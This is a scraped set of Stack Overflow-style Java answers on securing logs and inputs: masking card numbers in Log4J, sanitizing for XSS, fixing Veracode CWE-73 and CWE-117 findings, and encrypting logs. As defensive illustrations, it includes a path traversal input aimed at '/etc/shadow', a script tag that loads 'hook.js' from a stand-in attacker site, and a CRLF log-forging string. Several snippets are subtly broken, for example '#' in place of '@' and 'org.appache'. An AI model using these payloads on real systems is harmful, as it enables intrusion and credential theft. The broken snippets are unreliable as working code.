How to mask credit card numbers in log files with Log4J?

How to mask credit card numbers in log files with Log4J? - java

Our web app needs to be made PCI compliant, i.e. it must not store any credit card numbers. The app is a frontend to a mainframe system which handles the CC numbers internally and - as we have just found out - occasionally still spits out a full CC number on one of its response screens. By default, the whole content of these responses are logged at debug level, and also the content parsed from these can be logged in lots of different places. So I can't hunt down the source of such data leaks. I must make sure that CC numbers are masked in our log files.
The regex part is not an issue, I will reuse the regex we already use in several other places. However I just can't find any good source on how to alter a part of a log message with Log4J. Filters seem to be much more limited, only able to decide whether to log a particular event or not, but can't alter the content of the message. I also found the ESAPI security wrapper API for Log4J which at first sight promises to do what I want. However, apparently I would need to replace all the loggers in the code with the ESAPI logger class - a pain in the butt. I would prefer a more transparent solution.
Any idea how to mask out credit card numbers from Log4J output?
Update: Based on #pgras's original idea, here is a working solution:
public class CardNumberFilteringLayout extends PatternLayout {
private static final String MASK = "$1++++++++++++";
private static final Pattern PATTERN = Pattern.compile("([0-9]{4})([0-9]{9,15})");
#Override
public String format(LoggingEvent event) {
if (event.getMessage() instanceof String) {
String message = event.getRenderedMessage();
Matcher matcher = PATTERN.matcher(message);
if (matcher.find()) {
String maskedMessage = matcher.replaceAll(MASK);
#SuppressWarnings({ "ThrowableResultOfMethodCallIgnored" })
Throwable throwable = event.getThrowableInformation() != null ?
event.getThrowableInformation().getThrowable() : null;
LoggingEvent maskedEvent = new LoggingEvent(event.fqnOfCategoryClass,
Logger.getLogger(event.getLoggerName()), event.timeStamp,
event.getLevel(), maskedMessage, throwable);
return super.format(maskedEvent);
}
}
return super.format(event);
}
}
Notes:
I mask with + rather than *, because I want to tell apart cases when the CID was masked by this logger, from cases when it was done by the backend server, or whoever else
I use a simplistic regex because I am not worried about false positives
The code is unit tested so I am fairly convinced it works properly. Of course, if you spot any possibility to improve it, please let me know :-)

You could write your own layout and configure it for all appenders...
Layout has a format method which makes a String from a loggingEvent that contains the logging message...

A better implementation of credit card number masking is at http://adamcaudill.com/2011/10/20/masking-credit-cards-for-pci/ .
You want to log the issuer and the checksum, but not the PAN (Primary Account Number).

Related

Sanitize/validate variable to avoid cross-site-scripting attack

I get this issue with CheckMarx security scan:
Method exec at line 69 of
web\src\main\java\abc\web\actions\HomeAction.java gets user input for
the CNF_KEY_COSN element. This element’s value then flows through the
code without being properly sanitized or validated and is eventually
displayed to the user in method logException at line 905 of
web\src\main\java\gov\abc\external\info\ServiceHelper.java. This may
enable a Cross-Site-Scripting attack.
Line 69 of HomeAction.java:
String cosn = (String) request.getParameter(CNF_KEY_CON);
Line 905 in ServiceHelper.java just logs the error:
private static void logException(InfoServiceException exception, String message) {
String newMessage = message + ": " + exception.getMessageForLogging();
try {
log.error(newMessage, exception);
} catch (Exception e) {
// fallback to console
System.out.println("error logging exception ->");
e.printStackTrace(System.out);
System.out.println("exception ->");
System.out.print(newMessage);
if (exception != null) exception.printStackTrace(System.out);
}
}
Changed another block of code in HomeAction.java to:
if(cosn!= null && cosn.matches("[0-9a-zA-Z_]+")) {
...
}
But that didn't help. How do I validate/sanitize/encode Line 69. Any help is much appreciated.
Thanks

You can sanitise strings for XSS attacks using Jsoup there is a clean() method for this. You would do something like this to sanitise the input:
String sanitizedInput = Jsoup.clean(originalInput, "", Whitelist.none(), new OutputSettings().prettyPrint(false));

Checkmarx defines a set of sanitizers that you can check in the system.
Based on your source code snippets; i assume that;
i) you are appending 'cosn' to 'message'
ii) application is web-based in nature (in view of the request.getParameter)
iii) message is been displayed to the console or log to a file.
You could consider using Google Guava or Apache Commons Test to html escape the input.
import com.google.common.html.HtmlEscapers;
public void testGuavaHtmlEscapers(){
String badInput = "<script> alert me! <script>";
String escapedLocation = HtmlEscapers.htmlEscaper().escape(badInput);
System.out.println("<h1> Location: " + escapedLocation + "<h1>");
}
import static org.apache.commons.text.StringEscapeUtils.escapeHtml4;
public void testHtmlEscapers(){
String badInput = "<script> alert me! <script>";
System.out.println(escapeHtml4(badInput));
}
I would also consider if there is sensitive information, that i should mask e.g., using String.replace.
public void testReplace(){
String email = "some-email#domail.com";
String masked = email.replaceAll("(?<=.).(?=[^#]*?.#)", "*");
System.out.println(masked);
}
Above 3 sanitization methods will work similarly.

This is likely a false positive (technically, "not exploitable" in Checkmarx) with regard to XSS, depending on how you process and display logs. If logs are ever displayed in a browser as html, it might be vulnerable to blind XSS from this applications point of view, but it would be a vulnerability in whatever component displays logs as html, and not in the code above.
Contrary to other answers, you should not encode the message here. Whatever technology you use for logging will of course have to encode it properly for its own use (like for example if it's stored as JSON, data will have to be JSON-encoded), but that has nothing to do with XSS, or with this problem at all.
This is just raw data, and you can store raw data as is. If you encode it here, you will have a hard time displaying it in any other way. For example if you apply html encoding, you can only display it in html (or you have to decode, which will negate any effect). It doesn't make sense. XSS would arise if you displayed these logs in a browser - in which case whatever displays it would have to encode it properly, but that's not the case here.
Note though that it can still be a log injection vulnerability. Make sure that whatever way you store logs, that log store **does* apply necessary encoding. If it's a text file, you probably want to remove newlines so that fake lines cannot be added to the log. If it's json, you will want to encode to json, and so on. But that's a feature of your log facility, and not the code above.

In Java, how do I extract the domain of a URL?

I'm using Java 8. I want to extract the domain portion of a URL. Just in case I'm using the word "domain" incorrectly, what i want is if my server name is
test.javabits.com
I want to extract "javabits.com". Similarly, if my server name is
firstpart.secondpart.lastpart.org
I want to extract "lastpart.org". I tried the below
final String domain = request.getServerName().replaceAll(".*\\.(?=.*\\.)", "");
but its not extracting the domain properly. Then I tried what this guy has in his site -- https://www.mkyong.com/regular-expressions/domain-name-regular-expression-example/, e.g.
private static final String DOMAIN_NAME_PATTERN = "^((?!-)[A-Za-z0-9-]{1,63}(?<!-)\\.)+[A-Za-z]{2,6}$";
but that is also not extracting what I want. How can I extract the domain name portion properly?

Summary: Do not use regex for this. Use whois.
If I try to extrapolate from your question, to find out what you really want to do, I guess you want to find the domain belonging to some non-infrastructural owner from the host part of a URL. Additionally, from the tag of your question, you want to do it with the help of a regex.
The task you are undertaking is at best impractical, but probably impossible.
There are a number of corner cases that you would have to weed out. Apart from the list of infrastructural domains kindly provided by Lennart in https://publicsuffix.org/list/public_suffix_list.dat, you also have the cases of an empty host field in the URL or an IP-address forming the host part.
So, is there a better approach to this? Of course there is. What you do want to do is query a public database for the data you need. The protocol for such queries is called WHOIS.
Apache Commons provide an easy way to access WHOIS information in the WhoisClient. From there you can query the domain field, and find some more information that may be useful to you.
It shouldn't be harder than
import org.apache.commons.net.whois.WhoisClient;
import java.io.IOException;
public class CommonsTest {
public static void main(String args) {
WhoisClient c = new WhoisClient();
try {
c.connect(WhoisClient.DEFAULT_HOST);
System.out.println(c.query(URL));
c.disconnect();
} catch (IOException e) {
e.printStackTrace();
}
}
}
Using this will get you the whois information aboutt he domain you are asking for. If the domain is uregistered, that is, is a private domain, as in the case of www.stackexchange.com you will get an error saying no domain is registered. Remove the first part of the address and try again. Once you found the registered domain, you will also find the registrar and the registrer.
Now, unfortunately, whois is not as simple as one would think. Read further on https://manpages.debian.org/jessie/whois/whois.1.en.html for an elaboration on how to use it and what information you can expect from different sources.
Also, check related questions here.

try it like this:
String parts[] = longDomain.split(".");
String domain = parts[parts.length-2] + "." + [parts.length -1];

How to resolve External Control of File Name or Path (CWE ID 73)

I am working on fixing Veracode issues in my application. Veracode has highlighted the flaw "External Control of File Name or Path (CWE ID 73) " in below code.
Thread.currentThread().getContextClassLoader().getResourceAsStream(lookupName)
How do I validate the parameter? If I need to use below ESAPI validation, then what is the exact parameter I should be passing in getValidFileName() method. Currently I am passing the parameters as below.
ESAPI.validator().getValidFileName(lookupName, lookupName,
ESAPI.securityConfiguration().getAllowedFileExtensions(), false);
Correct me whether I am following the right approach for fixing this issue.

There are several suggestions at: https://community.veracode.com/s/article/how-do-i-fix-cwe-73-external-control-of-file-name-or-path-in-java
You can use hardcoded values, if these files are stored in the server side.
(i.e.: in a HashMap).
Another solution is to use a custom validator (from veracode page) :
// GOOD Code
String extension = request.getParameter("extension");
File f = new File(buildValidAvatarPath(extension))
#FilePathCleanser
public String buildValidAvatarPath(extension) {
String[] allowedExtensions = new String[]{"jpg","gif","png"};
String extension = "png"; // Default extension
for (String allowedExtension: allowedExtensions) {
if (allowedExtension.equals(request.getParameter("extension"))) {
extension = request.getParameter("extension");
}
}
// See "Note on authorization"
User user = getCurrentUser();
if (!userMayAccessFile(user, path)) {
throw new AuthorizationException("User may not access this file", user);
}
File(configPath + "avatar." + extension)
return path;
}

Okay, so the problem is that you are allowing user-control of that file path. Imagine its on a UNIX box and they enter:
../../../../../../../etc/shadow
Whatever user privileges are granted to the user running that java Thread is possible to expose to the user in question. I don't know what processing is going on in your application, but the danger is that you need to prevent user control of that lookup variable.
The call you're making is consistent with the single test in ValidatorTest.java, which is definitely a deficiency in code coverage on our behalf.
Now, there's an excellent chance that even if you use this call that Veracode might still flag it: the default file list in ESAPI.properties will need to be either truncated for your use case, or you'll have to create your own Validator rule for legal file extensions for your specific use case.
Which brings up the next bit: There's a lot of mischief that can happen in regards to file uploads.
In short, to be actually secure about file uploads will require more than what ESAPI currently offers, which is unfortunately, only an extension check. In your particular case, make sure you try some directory traversal attacks. And use that OWASP link to help analyze your application.
Given that the OP wants to clear the issue in Veracode, you would want to chain a couple calls:
ESAPI.validator().getValidDirectoryPath() and ESAPI.Validator.getValidFileName()
But be sure you've properly truncated the extension list in HttpUtilities.ApprovedUploadExtensions in validator.properties as the default list is too permissive, at least until we release 2.1.0.2.
I have to stress however that even with this particular combination there is absolutely nothing ESAPI does to prevent a user from renaming "netcat.exe" to "puppies.xlsx" and bypassing your validation check, that's why the rant on the first part of this answer.
ESAPI's file validation is NOT secure, it's quite simply better than nothing at all.
Doing this correctly requires more work than just using 1-2 calls to ESAPI.
DISCLAIMER: as of this writing I am the project co-lead for ESAPI.

You can change file name by sanitizing it as below code snippet:
private static String sanitizeFileName(String name) {
return name
.chars()
.mapToObj(i -> (char) i)
.map(c -> Character.isWhitespace(c) ? '_' : c)
.filter(c -> Character.isLetterOrDigit(c) || c == '-' || c == '_' || c == ':')
.map(String::valueOf)
.collect(Collectors.joining());
}

How to fix Veracode CWE 117 (Improper Output Neutralization for Logs)

There is an Spring global #ExceptionHandler(Exception.class) method which logs exception like that:
#ExceptionHandler(Exception.class)
void handleException(Exception ex) {
logger.error("Simple error message", ex);
...
Veracode scan says that this logging has Improper Output Neutralization for Logs and suggest to use ESAPI logger. Is there any way how to fix this vulnerability without changing logger to ESAPI? This is the only place in code where I faced this issue and I try to figure out how to fix it with minimum changes. Maybe ESAPI has some methods I haven't noticed?
P.S. Current logger is Log4j over slf4j
UPD:
In the end I used ESAPI logger. I thought it wouldn't use my default logging service, but I was wrong and it simply used my slf4j logger interface with appropriate configuration.
private static final Logger logger = ESAPI.getLogger(MyClass.class);
...
logger.error(null, "Simple error message", ex);
ESAPI has extension of log4j logger and logger factory. It can be configured what to use in ESAPI.properties. For example:
ESAPI.Logger=org.owasp.esapi.reference.Log4JLogFactory

Is there any way how to fix this vulnerability without changing
logger to ESAPI?
In short, yes.
TLDR:
First understand the gravity of the error. The main concern is in falsifying the log statments. Say you had code like this:
log.error( transactionId + " for user " + username + " was unsuccessful."
If either variable is under user control they can inject false logging statements by using inputs like \r\n for user foobar was successful\rn thus allowing them to falsify the log and cover their tracks. (Well, in this contrived case, just make it a little harder to see what happened.)
The second method of attack is more of a chess move. Many logs are HTML formatted to be viewed in another program, for this example, we'll pretend the logs are meant to be HTML files to be viewed in a browser. Now we inject <script src=”https://evilsite.com/hook.js” type=”text/javascript”></script> and you will have hooked a browser with an exploitation framework that's most likely executing as a server admin... because its doubtful that the CEO is going to be reading the log. Now the real hack can begin.
Defenses:
A simple defense is to make sure that all log statements with userinput escape the characters '\n' and '\r' with something obvious, like '֎' or you can do what ESAPI does and escape with the underscore. It really doesn't matter as long as its consistent, just keep in mind not to use character sets that would confuse you in the log. Something like userInput.replaceAll("\r", "֎").replaceAll("\n", "֎");
I also find it useful to make sure that log formats are exquisitely specified... meaning that you make sure you have a strict standard for what log statements need to look like and construct your formatting so that catching a malicious user is easier. All programmers must submit to the party and follow the format!
To defend against the HTML scenario, I would use the [OWASP encoder project][1]
As to why ESAPI's implementation is suggested, it is a very battle-tested library, but in a nutshell, this is essentially what we do. See the code:
/**
* Log the message after optionally encoding any special characters that might be dangerous when viewed
* by an HTML based log viewer. Also encode any carriage returns and line feeds to prevent log
* injection attacks. This logs all the supplied parameters plus the user ID, user's source IP, a logging
* specific session ID, and the current date/time.
*
* It will only log the message if the current logging level is enabled, otherwise it will
* discard the message.
*
* #param level defines the set of recognized logging levels (TRACE, INFO, DEBUG, WARNING, ERROR, FATAL)
* #param type the type of the event (SECURITY SUCCESS, SECURITY FAILURE, EVENT SUCCESS, EVENT FAILURE)
* #param message the message to be logged
* #param throwable the {#code Throwable} from which to generate an exception stack trace.
*/
private void log(Level level, EventType type, String message, Throwable throwable) {
// Check to see if we need to log.
if (!isEnabledFor(level)) {
return;
}
// ensure there's something to log
if (message == null) {
message = "";
}
// ensure no CRLF injection into logs for forging records
String clean = message.replace('\n', '_').replace('\r', '_');
if (ESAPI.securityConfiguration().getLogEncodingRequired()) {
clean = ESAPI.encoder().encodeForHTML(message);
if (!message.equals(clean)) {
clean += " (Encoded)";
}
}
// log server, port, app name, module name -- server:80/app/module
StringBuilder appInfo = new StringBuilder();
if (ESAPI.currentRequest() != null && logServerIP) {
appInfo.append(ESAPI.currentRequest().getLocalAddr()).append(":").append(ESAPI.currentRequest().getLocalPort());
}
if (logAppName) {
appInfo.append("/").append(applicationName);
}
appInfo.append("/").append(getName());
//get the type text if it exists
String typeInfo = "";
if (type != null) {
typeInfo += type + " ";
}
// log the message
// Fix for https://code.google.com/p/owasp-esapi-java/issues/detail?id=268
// need to pass callerFQCN so the log is not generated as if it were always generated from this wrapper class
log(Log4JLogger.class.getName(), level, "[" + typeInfo + getUserInfo() + " -> " + appInfo + "] " + clean, throwable);
}
See lines 398-453. That's all the escaping that ESAPI provides. I would suggest copying the unit tests as well.
[DISCLAIMER]: I am project co-lead on ESAPI.
[1]: https://www.owasp.org/index.php/OWASP_Java_Encoder_Project and make sure your inputs are properly encoded when going into logging statements--every bit as much as when you're sending input back to the user.

I am new to Veracode and was facing CWE-117. I understood this error is raised by Veracode when your logger statement has the potential to get attacked via malicious request's parameter values passed in. So we need to removed /r and /n (CRLF) from variables that are getting used in the logger statement.
Most of the newbie will wonder what method should be used to remove CRLF from variable passed in logger statement. Also sometime replaceAll() will not work as it is not an approved method by Veracode. Therefore, here is the link to approved methods by Veracode to handles CWE problems.
[Link Expired #22.11.2022] https://help.veracode.com/reader/4EKhlLSMHm5jC8P8j3XccQ/IiF_rOE79ANbwnZwreSPGA
In my case I have used org.springframework.web.util.HtmlUtils.htmlEscape mentioned in the above link and it resolved the problem.
private static final Logger LOG = LoggerFactory.getLogger(MemberController.class);
//problematic logger statement
LOG.info("brand {}, country {}",brand,country);
//Correct logger statement
LOG.info("brand {}, country {}",org.springframework.web.util.HtmlUtils.htmlEscape(brand),org.springframework.web.util.HtmlUtils.htmlEscape(country));
Edit-1: Veracode has stopped suggesting any particular function/method for sanitization of the logger variable. However still above solution will work. Find out the below link suggested by Veracode which explains what to do and how to do it to fix CWE-117 for some languages.
https://community.veracode.com/s/article/How-to-Fix-CWE-117-Improper-Output-Neutralization-for-Logs
JAVA: Using ESAPI library from OWASP for the logger. Checkout more details in link https://www.veracode.com/security/java/cwe-117

If you are using Logback use the replace function in your logback config pattern
original pattern
<pattern>%d %level %logger : %msg%n</pattern>
with replace
<pattern>%d %level %logger : %replace(%msg){'[\r\n]', '_'} %n</pattern>
if you want to strip <script> tag as well
<pattern>%d %-5level %logger : %replace(%msg){'[\r\n]|<script', '_'} %n</pattern>
This way you dont need to to modify individual log statements.

Though I am a bit late but I think it would help those who do not want to use ESAPI library and facing issue only for exception handler class
Use apache commons library
import org.apache.commons.lang3.exception.ExceptionUtils;
LOG.error(ExceptionUtils.getStackTrace(ex));

In order to avoid Veracode CWE 117 vulnerability I have used a custom logger class which uses HtmlUtils.htmlEscape() function to mitigate the vulnerablity.
Recommended solution to this problem by Veracode is to use ESAPI loggers but if you dont want to add an extra dependency to your project this should work fine.
https://github.com/divyashree11/VeracodeFixesJava/blob/master/spring-annotation-logs-demo/src/main/java/com/spring/demo/util/CustomLogger.java

I have tried with HtmlEscape of org.springframework.web.util.HtmlUtils, but it did not resolve by veracode's vulnerability. Give a try to below solution.
For Java use:
StringEscapeUtils.escapeJava(str)
For Html/JSP use:
StringEscapeUtils.escapeHtml(str)
Please use below package:
import org.appache.commons.lang.StringEscapeUtils;

Encrypted logger for Java

I'll put the question upfront:
Is there a logger available in Java that does encryption(preferably 128-bit AES or better)?
I've done a lot of searching for this over the last couple of days. There's a few common themes to what I've found:
Dissecting information between log4j and log4j2 is giving me headaches(but mostly unrelated to the task at hand)
Most threads are dated, including the ones here on SO. This one is probably the best I've found on SO, and one of the newer answers links to a roll-your-own version.
The most common answer is "roll-your-own", but these answers are also a few years old at this point.
A lot of people question why I or anyone would do this in Java anyway, since it's simple enough to analyze Java code even without the source.
For the last point, it's pretty much a moot point for my project. We also use a code obfuscator and could employ other obfuscation techniques. The point of using encryption is simply to raise the bar of figuring out our logs above "trivially easy", even if it's only raised to "mildly time-consuming". A slightly relevant aside - the kind of logging we're going to encrypt is intended merely for alpha/beta, and will likely only include debug, warn, and error levels of logging(so the number of messages to encrypt should be fairly low).
The best I've found for Log4j2 is in their documentation:
KeyProviders
Some components within Log4j may provide the ability to perform data encryption. These components require a secret key to perform the encryption. Applications may provide the key by creating a class that implements the SecretKeyProvider interface.
But I haven't really found anything other than wispy statements along the lines of 'plug-ins are able of doing encryption'. I haven't found a plug-in that actually has that capability.
I have also just started trying to find other loggers for Java to see if they have one implemented, but nothing is really jumping out for searches like 'java logging encryption'.

Basically log encryption is not best practise there are limited situations where you can need this functionality. As mainly people which have access to logs have also access to JVM, and in JVM all the logs are at least generated as Strings so even if you encrypt them in the log file or console the real values will be available in JVM String Pool, so if anyone will every need to hack your logs it will be as easy as have a look in string pool.
But anyway if you need a way to encrypt the logs, and as there is no generic way for this, the best way in my opinion is to go with Aspect J. This will have minimum impact on you sources, you will write code as you have done before, but the logs will be encrypted. Following is a simple application code which will encrypt all the logs from all the compiled sources using Aspctj, and Slf4j as logging facade and Log4j2 as logging implementation.
The simple class which logs the "Hello World"
public class Main {
private static final transient Logger LOG = LoggerFactory
.getLogger(Main.class);
public static void main(String[] args) {
LOG.info("Hello World");
LOG.info("Hello {0}", "World 2");
}
}
Aspect which encrypts (in this case just edits the text)
#Aspect
public class LogEncryptAspect {
#Around("call(* org.slf4j.Logger.info(..))")
public Object encryptLog (ProceedingJoinPoint thisJoinPoint) throws Throwable{
Object[] arguments = thisJoinPoint.getArgs();
if(arguments[0] instanceof String){
String encryptedLog = encryptLogMessage ((String) arguments[0], arguments.length > 1 ? Arrays.copyOfRange(arguments, 1, arguments.length) : null);
arguments[0] = encryptedLog;
}
return thisJoinPoint.proceed(arguments);
}
// TODO change this to apply some kind of encryption
public final String encryptLogMessage (String message, Object... args){
if(args != null){
return MessageFormat.format(message, args) + " encrypted";
}
return message + " encrypted";
}
}
The output is :
[main] INFO xxx.Main - Hello World encrypted
[main] INFO xxx.Main - Hello World 2 encrypted

Develop Reference

Java is a programming language and computing platform first released by Sun Microsystems in 1995.